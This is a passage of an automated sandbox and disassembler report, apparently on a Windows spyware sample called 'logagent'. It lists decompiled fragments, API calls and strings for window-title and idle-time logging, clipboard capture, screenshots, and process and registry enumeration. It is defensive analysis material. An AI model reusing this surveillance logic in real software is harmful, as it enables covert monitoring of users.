                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                  								L00414176();
                                  								L00414170();
                                  								_t99 = _t99 + 0xc - 0x10 + 0x18;
                                  								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                  								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  								goto L16;
                                  							}
                                  							_v16 = _t48;
                                  							Sleep(0x3e8);
                                  						}
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						break;
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                  • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                  • GetForegroundWindow.USER32 ref: 00405A12
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                  • GetWindowTextA.USER32 ref: 00405A52
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                  • _itoa.MSVCRT ref: 00405B3D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                  • String ID: [ ${ User has been idle for $ ]$ minutes }
                                  • API String ID: 615312007-3343415809
                                  • Opcode ID: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                  • Opcode Fuzzy Hash: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                    • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                  • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                  • String ID: dat$image/png$png
                                  • API String ID: 3276867942-186023265
                                  • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                  • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409ECF
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                    • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6DF7CB60), ref: 00412B5E
                                    • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                  • String ID:
                                  • API String ID: 819894693-0
                                  • Opcode ID: aa41e3f6cb2fc5e209ae9a7f481b9b05acfc944ab05c561c6cee0746ec8840d9
                                  • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                  • Opcode Fuzzy Hash: aa41e3f6cb2fc5e209ae9a7f481b9b05acfc944ab05c561c6cee0746ec8840d9
                                  • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(0040BE7D,?,00000104,00000000,0040BE7D,?,?,00000000,?,?,?,?), ref: 0040BB8F
                                  • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                  • _itoa.MSVCRT ref: 0040BC7E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                  • String ID: [regsplt]
                                  • API String ID: 2158026845-4262303796
                                  • Opcode ID: db93dbe62ffaff1a340e82fc22c82cb1b90df84899925d05a75b1ca4fcd74a37
                                  • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                  • Opcode Fuzzy Hash: db93dbe62ffaff1a340e82fc22c82cb1b90df84899925d05a75b1ca4fcd74a37
                                  • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                  • getenv.MSVCRT ref: 0040EFDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                  • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
